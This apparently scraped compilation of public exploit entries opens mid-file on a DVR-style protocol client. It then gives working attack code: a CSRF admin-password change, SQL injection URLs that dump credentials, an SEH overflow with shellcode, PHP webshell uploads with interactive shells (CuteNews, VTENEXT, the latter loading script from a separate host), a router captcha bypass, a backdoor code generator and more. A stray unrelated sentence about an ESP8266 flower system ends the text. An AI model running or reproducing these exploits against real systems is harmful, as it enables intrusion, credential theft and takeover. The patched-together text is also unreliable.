return buf
class Channel:
def __init__(self, ip, port=3001):
self.ip = ip
self.ip_bytes = socket.inet_aton(ip)[::-1]
self.port = port
self.msg_seq = 0
self.data_seq = 0
self.msg_queue = []
def fileno(self):
return self.socket.fileno()
def connect(self):
self.socket = socket.socket()
self.socket.connect((self.ip, self.port))
def reconnect(self):
self.socket.close()
self.connect()
def send_cmd(self, data):
self.socket.sendall(b'\xf1\xf5\xea\xf5' + struct.pack('<HH8xI', self.msg_seq, len(data) + 20, len(data)) + data)
self.msg_seq += 1
def send_data(self, stream_type, data):
self.socket.sendall(struct.pack('<4sI4sHHI', b'\xf1\xf5\xea\xf9', self.data_seq, self.ip_bytes, 0, len(data) + 20, stream_type) + data)
self.data_seq += 1
def recv(self):
hdr = recvall(self.socket, 20)
if hdr[:4] == b'\xf1\xf5\xea\xf9':
lsize, stream_type = struct.unpack('<14xHI', hdr)
data = recvall(self.socket, lsize - 20)
if data[:4] != b'NVS\x00':
print(data[:4], b'NVS\x00')
raise Exception('invalid data header')
return None, [stream_type, data[8:]]
elif hdr[:4] == b'\xf1\xf5\xea\xf5':
lsize, dsize = struct.unpack('<6xH10xH', hdr)
if lsize != dsize + 20:
raise Exception('size mismatch')
msgs = []
for msg in recvall(self.socket, dsize).decode().strip().split('\n\n\n'):
msg = msg.split('\t')
if '.' not in msg[0]:
msg = [self.ip] + msg
msgs.append(msg)
return msgs, None
else:
raise Exception('invalid packet magic: ' + hdr[:4].hex())
def recv_msg(self):
if len(self.msg_queue):
ret = self.msg_queue[0]
self.msg_queue = self.msg_queue[1:]
return ret
msgs, _ = self.recv()
if len(msgs) > 1:
self.msg_queue.extend(msgs[1:])
return msgs[0]
def send_msg(self, msg):
self.send_cmd((self.ip+'\t'+'\t'.join(msg)+'\n\n\n').encode())
def get_crypt_key(self, mode=1, uname=b'Admin', pw=b'Admin'):
self.send_msg(['IP', 'USER', 'LOGON', base64.b64encode(uname).decode(), base64.b64encode(pw).decode(), '', str(mode), 'UTF-8', '805306367', '1'])
resp = self.recv_msg()
if resp[4:6] != ['LOGONFAILED', '3']:
print(resp)
raise Exception('unrecognized login response')
crypt_key = base64.b64decode(resp[8])
return crypt_key
def login_with_key(self, uname, pw, crypt_key):
self.reconnect()
hashed_uname = base64.b64encode(hashlib.md5(uname.lower()+crypt_key).digest())
hashed_pw = base64.b64encode(hashlib.md5(pw+crypt_key).digest())
self.send_msg(['IP', 'USER', 'LOGON', hashed_uname.decode(), hashed_pw.decode(), '', '1', 'UTF-8', '1', '1'])
resp = self.recv_msg()
if resp[4] == 'LOGONFAILED':
return False
self.msg_queue = [resp] + self.msg_queue
return True
def login(self, uname, pw):
crypt_key = self.get_crypt_key(1, uname, pw)
if not self.login_with_key(uname, pw, crypt_key):
return False
return crypt_key
###
### lib/crypt.py
###
pat = b'abcdefghijklmnopqrstuvwxyz0123456789'
def td_asctonum(code):
if code in b'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
code += 0x20
if code not in pat:
return None
return pat.index(code)
def td_numtoasc(code):
if code < 36:
return pat[code]
return None
gword = [
b'SjiW8JO7mH65awR3B4kTZeU90N1szIMrF2PC',
b'04A1EF7rCH3fYl9UngKRcObJD6ve8W5jdTta',
b'brU5XqY02ZcA3ygE6lf74BIG9LF8PzOHmTaC',
b'2I1vF5NMYd0L68aQrp7gTwc4RP9kniJyfuCH',
b'136HjBIPWzXCY9VMQa7JRiT4kKv2FGS5s8Lt',
b'Hwrhs0Y1Ic3Eq25a6t8Z7TQXVMgdePuxCNzJ',
b'WAmkt3RCZM829P4g1hanBluw6eVGSf7E05oX',
b'dMxreKZ35tRQg8E02UNTaoI76wGSvVh9Wmc1',
b'i20mzKraY74A6qR9QM8H3ecUkBlpJC1nyFSZ',
b'XCAUP6H37toQWSgsNanf0j21VKu9T4EqyGd5',
b'dFZPb9B6z1TavMUmXQHk7x402oEhKJD58pyG',
b'rg8V3snTAX6xjuoCYf519BzWRtcMl2OiZNeI',
b'dZe620lr8JW4iFhNj3K1x59Una7PXsLGvSmB',
b'5yaQlGSArNzek6MXZ1BPOE3xV470h9KvgYmb',
b'f12CVxeQ56YWd7OTXDtlnPqugjJikELayvMs',
b'9Qoa5XkM6iIrR7u8tNZgSpbdDUWvwH21Kyzh',
b'AqGWke65Y2ufVgljEhMHJL01D8Zptvcw7CxX',
b't960P2inR8qEVmAUsDZIpH5wzSXJ43ob1kGW',
b'4l6SAi2KhveRHVN5JGcmx9jOC3afB7wF0ITq',
b'tEOp6Xo87QzPbn24J3i9FjWKS1lIBVaMZeHU',
b'zx27DH915lhs04aMJOgf6Z3pyERrGndiLwIe',
b'8XxOBzZ02hUWDQfvL471q9RC6sAaJVFuTMdG',
b'jON0i4C6Z3K97DkbqSypH8lRmx5o2eIwXas1',
b'OIGT0ubwH1x6hCvEgBn274A5Q8K9e3YyzWlm',
b'zgejY41CLwRNabovBUP2Aql7FVM8uEDXZQ0c',
b'Z2MpQE91gdRLYJ8bGIWyOfc4v03Hjzs6VlU5',
b't6PuvrBXeoHk5FJW08DYQSI49GCwZ27cA1UK',
b'FiBA53IMW97kYNz82GhHf1yUCdL0nlvRD46s',
b'2Vz3b06h54jmc7a8AIYtNHM1iQU9wBXWyJkR',
b'wyI42azocV3UOX6fk579hMH8eEGJsgFuBmqb',
b'TxmnK4ljJ9iroY8vVtg3Rae2L516fBWUuXAS',
b'z6Y1bPrJEln0uWeLKkjo9IZ2y7ROcFHqBm54',
b'x064LFB39TsXeryqvt2pZN8QIERuWAVUmwjJ',
b'76qg85yB31uH90YbZofsjKrRGiTVndAEtFMx',
b'WjwTEbCA752kq89shcaLB1xO64rgMYnoFiJQ',
b'u6307O4J2DeZs8UYyjlzfX91KGmavEdwTRSg'
]
def td_decrypt(data, key):
kdx = 0
ret = []
for idx, code in enumerate(data):
while True:
if kdx >= len(key):
kdx = 0
kcode = key[kdx]
knum = td_asctonum(kcode)
if knum is None:
kdx += 1
continue
break
if code not in gword[knum]:
return None
cpos = gword[knum].index(code)
ret.append(td_numtoasc(cpos))
kdx += 1
return bytes(ret)
if __name__ == '__main__':
main()
# Exploit Title: Scopia XT Desktop 8.3.915.4 - Cross-Site Request Forgery (change admin password)
# Google Dork: inurl:scopia+index.jsp
# Date: 2020-09-09
# Exploit Author: v1n1v131r4
# Vendor Homepage: https://avaya.com
# Software Link: https://support.avaya.com/downloads/download-details.action?contentId=C201772012204170_4&productId=P1605
# Version: 8.3.915.4
# Tested on: Windows 10 Pro
# CVE : N/A
# PoC: https://github.com/V1n1v131r4/Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4
# CSRF to change admin password
# The admin password will be changed to "attacker"
<!DOCTYPE html>
<html>
<body>
<form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp">
<input type="text" name="JSESSIONID" value="">
<input type="text" name="newadminusername" value="">
<input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C">
<input type="text" name="newenablext1000meetingpin" value="false">
<input type="text" name="newxt1000meetingpin" value="EB8169F43227957C">
<input type="text" name="checkstatus" value="true">
<input type="submit" value="Send">
</form>
</body>
</html>
# Exploit Title: Tailor Management System - 'id' SQL Injection
# Google Dork: N/A
# Date: 2020-09-08
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL
# Version: v1.0
# Tested on: Kali linux
# CVE: N/A
http://localhost/tailor/addmeasurement.php?id=-1'+union+select+concat(username,0x3a,password),2+from+users-- -
http://localhost/tailor/staffedit.php?id=-1'+union+select+1,2,3,concat(username,0x3a,password),5+from+users-- -
http://localhost/tailor/staffcatedit.php?id=-3'+union+select+concat(username,0x3a,password)+from+users-- -
# Exploit Title: Audio Playback Recorder 3.2.2 - Local Buffer Overflow (SEH)
# Date: 2020-09-08
# Author: Felipe Winsnes
# Software Link: https://archive.org/download/tucows_288670_Audio_Playback_Recorder/AudioRec.exe
# Version: 3.2.2
# Tested on: Windows 7 (x86)
# Blog: https://whitecr0wz.github.io/
# Proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings11/11-proof.gif
# Proof of Concept:
# 1.- Run the python script, it will create the file "poc.txt" & "buf.txt".
# 2.- Copy the content of the new file "buf.txt" to clipboard.
# 3.- Open the application.
# 4.- Click on the bottom-right blue button to eject.
# 5.- Delete everything on the parameter and paste the clipboard (buf.txt).
# 6.- Click eject once again to close it.
# 7.- Copy poc.txt to the clipboard.
# 8.- Click on "Register".
# 9.- Paste clipboard (poc.txt) on the parameter "Name".
# 10.- Profit.
import struct
# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
# Payload size: 447 bytes
buf = b"w00tw00t"
buf += b"\x89\xe2\xda\xd4\xd9\x72\xf4\x59\x49\x49\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37"
buf += b"\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
buf += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
buf += b"\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x4b\x58\x6d\x52"
buf += b"\x63\x30\x47\x70\x63\x30\x61\x70\x6b\x39\x4a\x45\x65"
buf += b"\x61\x4f\x30\x33\x54\x6e\x6b\x30\x50\x66\x50\x6c\x4b"
buf += b"\x62\x72\x54\x4c\x4c\x4b\x33\x62\x32\x34\x4c\x4b\x42"
buf += b"\x52\x64\x68\x64\x4f\x4d\x67\x42\x6a\x37\x56\x36\x51"
buf += b"\x39\x6f\x4e\x4c\x67\x4c\x50\x61\x31\x6c\x45\x52\x36"
buf += b"\x4c\x45\x70\x7a\x61\x78\x4f\x46\x6d\x37\x71\x4a\x67"
buf += b"\x79\x72\x78\x72\x36\x32\x43\x67\x6e\x6b\x56\x32\x34"
buf += b"\x50\x6e\x6b\x51\x5a\x77\x4c\x6e\x6b\x52\x6c\x74\x51"
buf += b"\x34\x38\x49\x73\x53\x78\x67\x71\x48\x51\x30\x51\x6e"
buf += b"\x6b\x62\x79\x37\x50\x56\x61\x6a\x73\x6c\x4b\x63\x79"
buf += b"\x45\x48\x79\x73\x47\x4a\x42\x69\x6c\x4b\x44\x74\x6c"
buf += b"\x4b\x56\x61\x68\x56\x76\x51\x59\x6f\x4c\x6c\x79\x51"
buf += b"\x58\x4f\x54\x4d\x77\x71\x39\x57\x76\x58\x4b\x50\x53"
buf += b"\x45\x38\x76\x47\x73\x71\x6d\x5a\x58\x37\x4b\x31\x6d"
buf += b"\x46\x44\x71\x65\x4a\x44\x33\x68\x4e\x6b\x36\x38\x57"
buf += b"\x54\x36\x61\x6a\x73\x43\x56\x6c\x4b\x54\x4c\x50\x4b"
buf += b"\x6c\x4b\x36\x38\x57\x6c\x75\x51\x6b\x63\x4c\x4b\x45"
buf += b"\x54\x4c\x4b\x65\x51\x6a\x70\x6f\x79\x73\x74\x57\x54"
buf += b"\x76\x44\x33\x6b\x63\x6b\x43\x51\x72\x79\x72\x7a\x63"
buf += b"\x61\x6b\x4f\x49\x70\x61\x4f\x63\x6f\x61\x4a\x4c\x4b"
buf += b"\x62\x32\x4a\x4b\x4e\x6d\x73\x6d\x61\x7a\x57\x71\x6c"
buf += b"\x4d\x4f\x75\x4c\x72\x47\x70\x65\x50\x35\x50\x56\x30"
buf += b"\x63\x58\x50\x31\x6e\x6b\x32\x4f\x4c\x47\x49\x6f\x79"
buf += b"\x45\x6d\x6b\x6d\x30\x47\x6d\x76\x4a\x65\x5a\x33\x58"
buf += b"\x49\x36\x7a\x35\x6d\x6d\x4d\x4d\x49\x6f\x4e\x35\x37"
buf += b"\x4c\x37\x76\x51\x6c\x35\x5a\x6f\x70\x6b\x4b\x4b\x50"
buf += b"\x63\x45\x54\x45\x6f\x4b\x53\x77\x54\x53\x71\x62\x70"
buf += b"\x6f\x50\x6a\x35\x50\x46\x33\x79\x6f\x68\x55\x31\x73"
buf += b"\x53\x51\x70\x6c\x43\x53\x56\x4e\x62\x45\x73\x48\x71"
buf += b"\x75\x67\x70\x41\x41"
egg = ""
egg += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egg += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
nseh = struct.pack("<I", 0x06710870)
seh = struct.pack("<I", 0x10023B71)
buffer = "A" * 456 + nseh + seh + "A" * 5 + egg + "\xff" * 200
f = open ("poc.txt", "w")
f.write(buffer)
f.close()
f = open ("buf.txt", "w")
f.write(buf)
f.close()
# Exploit Title: CuteNews 2.1.2 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-09-10
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://cutephp.com/cutenews/downloading.php
# Software Link: https://cutephp.com/cutenews/downloading.php
# Version: CuteNews 2.1.2
# Tested on: Ubuntu 20.04, CuteNews 2.1.2
# CVE : CVE-2019-11447
#! /bin/env python3
import requests
from base64 import b64decode
import io
import re
import string
import random
import sys
banner = """
_____ __ _ __ ___ ___ ___
/ ___/_ __/ /____ / |/ /__ _ _____ |_ | < / |_ |
/ /__/ // / __/ -_) / -_) |/|/ (_-< / __/_ / / / __/
\___/\_,_/\__/\__/_/|_/\__/|__,__/___/ /____(_)_(_)____/
___ _________
/ _ \/ ___/ __/
/ , _/ /__/ _/
/_/|_|\___/___/
"""
print (banner)
print ("[->] Usage python3 expoit.py")
print ()
sess = requests.session()
payload = "GIF8;\n<?php system($_REQUEST['cmd']) ?>"
ip = input("Enter the URL> ")
def extract_credentials():
global sess, ip
url = f"{ip}/CuteNews/cdata/users/lines"
encoded_creds = sess.get(url).text
buff = io.StringIO(encoded_creds)
chash = buff.readlines()
if "Not Found" in encoded_creds:
print ("[-] No hashes were found skipping!!!")
return
else:
for line in chash:
if "<?php die('Direct call - access denied'); ?>" not in line:
credentials = b64decode(line)
try:
sha_hash = re.search('"pass";s:64:"(.*?)"', credentials.decode()).group(1)
print (sha_hash)
except:
pass
def register():
global sess, ip
userpass = "".join(random.SystemRandom().choice(string.ascii_letters + string.digits ) for _ in range(10))
postdata = {
"action" : "register",
"regusername" : userpass,
"regnickname" : userpass,
"regpassword" : userpass,
"confirm" : userpass,
"regemail" : f"{userpass}@hack.me"
}
register = sess.post(f"{ip}/CuteNews/index.php?register", data = postdata, allow_redirects = False)
if 302 == register.status_code:
print (f"[+] Registration successful with username: {userpass} and password: {userpass}")
else:
sys.exit()
def send_payload(payload):
global ip
token = sess.get(f"{ip}/CuteNews/index.php?mod=main&opt=personal").text
signature_key = re.search('signature_key" value="(.*?)"', token).group(1)
signature_dsi = re.search('signature_dsi" value="(.*?)"', token).group(1)
logged_user = re.search('disabled="disabled" value="(.*?)"', token).group(1)
print (f"signature_key: {signature_key}")
print (f"signature_dsi: {signature_dsi}")
print (f"logged in user: {logged_user}")
files = {
"mod" : (None, "main"),
"opt" : (None, "personal"),
"__signature_key" : (None, f"{signature_key}"),
"__signature_dsi" : (None, f"{signature_dsi}"),
"editpassword" : (None, ""),
"confirmpassword" : (None, ""),
"editnickname" : (None, logged_user),
"avatar_file" : (f"{logged_user}.php", payload),
"more[site]" : (None, ""),
"more[about]" : (None, "")
}
payload_send = sess.post(f"{ip}/CuteNews/index.php", files = files).text
print("============================\nDropping to a SHELL\n============================")
while True:
print ()
command = input("command > ")
postdata = {"cmd" : command}
output = sess.post(f"{ip}/CuteNews/uploads/avatar_{logged_user}_{logged_user}.php", data=postdata)
if 404 == output.status_code:
print ("sorry i can't find your webshell try running the exploit again")
sys.exit()
else:
output = re.sub("GIF8;", "", output.text)
print (output.strip())
if __name__ == "__main__":
print ("================================================================\nUsers SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN\n================================================================")
extract_credentials()
print ("================================================================")
print()
print ("=============================\nRegistering a users\n=============================")
register()
print()
print("=======================================================\nSending Payload\n=======================================================")
send_payload(payload)
print ()
# Exploit Title: ZTE Router F602W - Captcha Bypass
# Exploit Author: Hritik Vijay (@MrHritik)
# Vendor Homepage: https://zte.com.cn
# Reported: 2019-06-14
# Version: F6x2W V6.0.10P2T2
# Version: F6x2W V6.0.10P2T5
# Tested on: F602W
# CVE: CVE-2020-6862
Background
-----------
Captcha is used to make sure the form is being filled by a real person
than an automated script. This is a very popular safety measure and
bypassing it could lead to potential compromise.
Introduction
------------
While logging in to the affected device you are presented with a
username, password and captcha field. Submitting the form results in an
HTTP request being sent out to /checkValidateCode.gch to validate the
captcha, if valid it goes on to really submit the login request. This
can be easily bypassed as this is a client side verification. One can
always ignore the response and proceed to forcefully submit the form via
Javascript (via calling the subpageSubmit() method).
A typical login request looks like this:
POST / HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Connection: close
Cookie: _TESTCOOKIESUPPORT=1
Upgrade-Insecure-Requests: 1
frashnum=&action=login&Frm_Logintoken=2&Username=admin&Password=admin&Validatecode=literally_anything
Though, firing the same request twice fails with a text on the top
saying "Error". This pretty much defeats our purpose. It turns out that
on every login attempt, the parameter Frm_Logintoken gets incremented by
one and is required to match the server side value. This can pretty
easily be achieved by some pattern matching. Thus allowing any script
to bypass the captcha and log in.
Threat
-------
A captcha bypass can really help in bruteforcing the credentials but
luckily the router limits the login trials to 3 attempts. In real
world though, things are a bit different.
The affected ZTE router comes with a default password. Given that the
devices on a same ISP network can access each other, it would be a
matter of time before someone writes a script to log in to every router
in the network and take control of it.
PoC
-------
#!/bin/bash
SERVER=192.168.1.1
USER="admin"
PASS="admin"
getToken(){
curl -s --cookie ' _TESTCOOKIESUPPORT=1; PATH=/;' $SERVER | grep 'Frm_Logintoken")' | cut -d\" -f4
}
Frm_Logintoken=`getToken`
s=$(curl -sv --data "frashnum=&action=login&Frm_Logintoken=$Frm_Logintoken&Username=$USER&Password=$PASS" --cookie ' _TESTCOOKIESUPPORT=1; PATH=/;' $SERVER -w "%{http_code}" -o /dev/null 2> /tmp/zte_cookie)
if [[ $s -eq 302 ]]; then
echo "Logged in"
echo "Open http://$SERVER/start.ghtml"
echo `grep -o Set-Cookie.* /tmp/zte_cookie`
else
echo "Failed"
fi
#!/usr/bin/env python3
# Exploit Title: Gnome Fonts Viewer 3.34.0 Heap Corruption
# Date: 2020-09-10
# Exploit Author: Cody Winkler
# Vendor Homepage: gnome.org
# Software Link: https://help.gnome.org/misc/release-notes/3.6/users-font-viewer.html
# Version: 3.34.0
# Tested On: Ubuntu 20.04.1 LTS
#
# Note: May take a few tries. Too many consecutive runs can freeze OS.
# This will trigger an infinite malloc() loop until gnome-font-viewer process is stopped.
from os import system
this_pattern = "BEEF"*21125 # needs to be filled to len ~84500
# TTF file header (probably has some junk data in it) taken from MesloLGS
NF Regular.ttf
ttf_header = ("\x00\x01\x00\x00\x00\x13\x01\x00\x00\x04\x00\x30\x46\x46\x54"
"\x4d\x75\xfe\x73\xdd\x00\x13\xb6\x0c\x00\x00\x00\x1c\x47\x44\x45"
"\x46\x4d\x76\x5d\xda\x00\x13\xb0\xac\x00\x00\x04\xaa\x47\x50\x4f"
"\x53\x44\x76\x4c\x75\x00\x13\xb5\xec\x00\x00\x00\x20\x47\x53\x55"
"\x42\x09\xf6\x0b\xdc\x00\x13\xb5\x58\x00\x00\x00\x92\x4f\x53\x2f"
"\x32\x8d\xbd\x8e\x75\x00\x00\x01\xb8\x00\x00\x00\x60\x50\x66\x45"
"\x64\x5b\xd3\xe9\x6b\x00\x13\xb6\x28\x00\x00\x02\x50\x63\x6d\x61"
"\x70\xbf\x0d\x76\x7c\x00\x00\x34\x30\x00\x00\x0a\x36\x63\x76\x74"
"\x20\x28\xfd\x02\x16\x00\x00\x48\x98\x00\x00\x00\x38\x66\x70\x67"
"\x6d\x31\xfc\xa0\x95\x00\x00\x3e\x68\x00\x00\x09\x96\x67\x61\x73"
"\x70\xff\xff\x00\x10\x00\x13\xb0\xa4\x00\x00\x00\x08\x67\x6c\x79"
"\x66\xd6\x2f\x24\x7c\x00\x00\xac\xf0\x00\x11\xd8\x34\x68\x65\x61"
"\x64\x04\xe3\x81\x66\x00\x00\x01\x3c\x00\x00\x00\x36\x68\x68\x65"
"\x61\x0a\xf4\x01\xa2\x00\x00\x01\x74\x00\x00\x00\x24\x68\x6d\x74"
"\x78\x93\xdf\x7e\x92\x00\x00\x02\x18\x00\x00\x32\x16\x6c\x6f\x63"
"\x61\xe6\x44\x45\x24\x00\x00\x48\xd0\x00\x00\x64\x20\x6d\x61\x78"
"\x70\x1a\xa2\x0b\x9c\x00\x00\x01\x98\x00\x00\x00\x20\x6e\x61\x6d"
"\x65\x62\x13\x17\xa4\x00\x12\x85\x24\x00\x00\x0b\x9d\x70\x6f\x73"
"\x74\xbb\xe8\x29\xcf\x00\x12\x90\xc4\x00\x01\x1f\xdd\x70\x72\x65"
"\x70\xb4\xc5\xc5\x72\x00\x00\x48\x00\x00\x00\x00\x95\x00\x01\x00"
"\x00\x00\x02\x07\x2b\xd0\x81\xfc\x0f\x5f\x0f\x3c\xf5\x02\x9f\x08"
"\x00\x00\x00\x00\x00\xc5\x74\x19\x33\x00\x00\x00\x00\xda\x9d\x14"
"\xf1\xfd\x41\xfc\xfc\x05\xdf\x0a")
print('[+] Generating crash.ttf with DEADDEAD')
with open("./crash.ttf", 'w') as f:
f.write(ttf_header)
f.write(this_pattern)
f.close()
print('[+] Done')
print('[+] Triggering out-of-bounds write in gnome-font-viewer')
system("/usr/bin/gnome-font-viewer ./crash.ttf")
#!/usr/bin/python3
# Exploit Title: VTENEXT 19 CE - Remote Code Execution
# Google Dork: n/a
# Date: 2020/09/09
# Exploit Author: Marco Ruela
# Vendor Homepage: https://www.vtenext.com/en/
# Software Link: Vendor removed vulnerable version from sourceforge.net
# Version: 19 CE
# Tested on: Ubuntu 16.04
# CVE : N/A
# 2020/03/07 - Disclosed vulnerabilities to vendor
# 2020/03/10 - Vendor committed to fix
# 2020/09/09 - Public disclosure
# This script should be easy enough to follow.
# We string together the three vulnerabilities to get RCE.
# XSS - The "From" field of the VTENEXT Messages module is vulnerable.
# File Upload - File extensions are checked against a $upload_badext in the config file, .pht extensions are allowed and executable by default .
# CSRF - No CSRF protections in place.
# exploit.js needs to be hosted somewhere, IP's need to be replaced
# check_csrf() should be changed based on your setup
# run_shell() is a "nice to have"
# content of exploit.js
"""
function insertImage() {
var xhr = new XMLHttpRequest();
xhr.open('POST','http://192.168.226.168/vtenext19ce/index.php?module=Myfiles&action=MyfilesAjax&file=UploadFile&folderid=&uniqueid=',true);
xhr.setRequestHeader('Content-type','multipart/form-data; boundary=---------------------------rekt');
xhr.setRequestHeader('Content-Length', '248');
xhr.setRequestHeader('Referer', 'http://172.16.233.146/vtenext19ce/index.php');
xhr.withCredentials = true;
var body = '-----------------------------rekt\nContent-Disposition: form-data; name="file_0"; filename="shell.pht"\nContent-Type: text/text\n\n<?php system($_GET[\'x\']); ?>\n\n-----------------------------rekt--';
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
insertImage();
"""
import smtplib
import datetime
import requests
import os
import time
base_url = "http://192.168.226.168/vtenext19ce/"
print("[*] CVE-2020-10227, CVE-2020-10228, CVE-2020-10229 - POC")
def build_url():
d = datetime.datetime.today()
year = str(d.year)
month = str(d.strftime("%B"))
week = "week" + str(d.isocalendar()[1] - d.replace(day=1).isocalendar()[1])
tmp = base_url + "storage/home/1/" + year + "/" + month + "/" + week + "/"
return(tmp)
def build_mail():
_from = """'<script src="http://192.168.226.1/exploit.js" onerror=alert(1) >'"""
_to = "admin@example.com"
_subject = "Important!"
_body = "While you're reading this, a file is being uploaded to this server."
msg = "From: " + _from + "\n"
msg += "To: " + _to + "\n"
msg += "Subject: " + _subject + "\n\n"
msg += _body
return msg
def send_mail():
msg = build_mail()
smtp_server = '192.168.226.167'
smtp_port = 25
sender = 'user1@lab.local'
receiver = 'admin@lab.local'
server = smtplib.SMTP(smtp_server, smtp_port)
server.sendmail(sender, receiver, msg)
def check_csrf():
while True:
is_there = os.popen('tail -n1 /var/log/apache2/access.log').read()
if "200" in is_there and "/exploit.js" in is_there and base_url in is_there:
print("[>] CSRF triggered")
break
else:
time.sleep(0.5)
continue
def find_shell():
print("[>] Locating shell")
time.sleep(1)
tmp1 = build_url()
for i in range(1, 9999):
url = tmp1 + str(i) + "_shell.pht"
r = requests.get(url)
if r.status_code == 200:
print("[>] Found the shell")
print("[-] Location: " + url)
return url
else:
continue
def run_shell(x):
print("\n")
while True:
cmd = input("shell> ")
if cmd == "exit":
break
else:
url = x + "?x=" + cmd
r = requests.get(url)
print(r.text)
print("[>] Sending email")
send_mail()
print("[-] Waiting for user to open mail")
check_csrf()
shell_location = find_shell()
run_shell(shell_location)
print("[!] Done!")
# Exploit Title: ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path
# Discovery by: Burhanettin Özgenç
# Discovery Date: 2020-09-15
# Vendor Homepage: https://www.forensit.com/downloads.html
# Tested Version: 2.2.0.4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ForensiTAppxService" | findstr /i /v """
ForensiT AppX Management Service ForensiTAppxService C:\Program Files (x86)\ForensiT\AppX Management Service\ForensiTAppxService.exe Auto
# Service info:
C:\>sc qc ForensiTAppxService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ForensiTAppxService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\ForensiT\AppX Management Service\ForensiTAppxService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ForensiT AppX Management Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit:
# A successful attempt would require the local user to be able to insert their code in the system
# root path undetected by the OS or other security applications where it could potentially be executed
# during application startup or reboot. If successful, the local user's code would execute with
# the elevated privileges of the application.
# Exploit Title: Mida eFramework 2.9.0 - Back Door Access
# Google Dork: Server: Mida eFramework
# Date: 2020-08-27
# Exploit Author: elbae
# Vendor Homepage: https://www.midasolutions.com/
# Software Link: http://ova-efw.midasolutions.com/
# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
# Version: <= 2.9.0
# CVE : CVE-2020-15921
#! /usr/bin/python3
# -*- coding: utf-8 -*-
from datetime import date
def print_disclaimer():
print("""
---------------------
Disclaimer:
1) For testing purpose only.
2) Do not attack production environments.
3) Intended for educational purposes only and cannot be used for law
violation or personal gain.
4) The author is not responsible for any possible harm caused by this
material.
---------------------""")
def print_info():
print("""
[*] Mida Solutions eFramework PDC Administrative Back-Door access
(CVE-2020-15921)
[*] Reference:
https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
[*] This script can be used to retrieve the code which gives you the
possibility to change the password.
[*] How it works:
1) run the script
2) copy the output to the URL you want to access (i.e.
http://192.168.1.60:8090/PDC/extreq.php?code=THE-CODE)
3) change the password
4) access as admin with the password """)
def main():
print_info()
print_disclaimer()
abc = ['a', 'b', 'c', 'd', 'e', 'f', 'g',
'h', 'i', 'j', 'k', 'l', 'm', 'n',
'o', 'p', 'q', 'r', 's', 't', 'u',
'v', 'w', 'x', 'y', 'z']
baseString = 'midasoluti' # default value from source code
today = date.today()
dateString = "{}0{:02d}0{}".format(today.day, today.month, today.year)
retString = ""
for i in range(0,len(baseString)):
n = int(abc.index(baseString[i]))
m = int(dateString[i])
s = n+m
if (s >= len(abc)):
s = m
retString += abc[s]
print("[+] Generated code: {}".format(retString))
print("[?] Example URL: http://target:8090/PDC/extreq.php?code={0}
".format(retString))
print("[?] Example URL: https://target/PDC/extreq.php?code={0}
".format(retString))
if __name__ == '__main__':
main()
# Exploit Title: Seat Reservation System 1.0 - 'id' SQL Injection
# Date: 2020-09-20
# Exploit Author: Augkim
# Vendor Homepage: https://www.sourcecodester.com/php/14452/seat-reservation-system-movie-theater-project-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip
# Tested on: Apache2
POST
/URL/index.php?page=reserve&id=''union%20select%201,version(),3,4,5,6,7,8--
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)
Gecko/20100101 Firefox/80.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/sere/
Connection: close
Cookie: PHPSESSID=lmuj4akmh6q1flmcbnuisgttom
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Origin: foo.example.org
PoC:
/URL/index.php?page=reserve&id=''union%20select%201,version(),3,4,5,6,7,8--
In order to enrich our elderly care life. In this article, we will introduce the use of Esp8266 to make an intelligent flower cultivation system.
Implementation of functions
